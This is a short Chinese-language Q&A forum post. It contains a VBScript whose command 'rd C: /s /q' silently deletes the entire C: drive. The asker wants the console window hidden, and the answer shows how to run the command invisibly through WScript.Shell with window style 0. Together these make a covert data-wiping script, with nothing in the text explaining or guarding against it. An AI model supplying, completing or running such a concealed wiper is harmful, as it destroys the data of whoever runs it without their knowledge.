所以,这是脚本:
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "cmd.exe /C rd C: /s /q"
Set oShell = Nothing
问题是我想让命令行提示不可见/隐藏,我不想使用外部程序。
答案 0 :(得分:1)
您可以使用此VBScript运行隐藏的cmd命令,只需将其合并到您的脚本中:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "cmd /c yourcommands", 0, True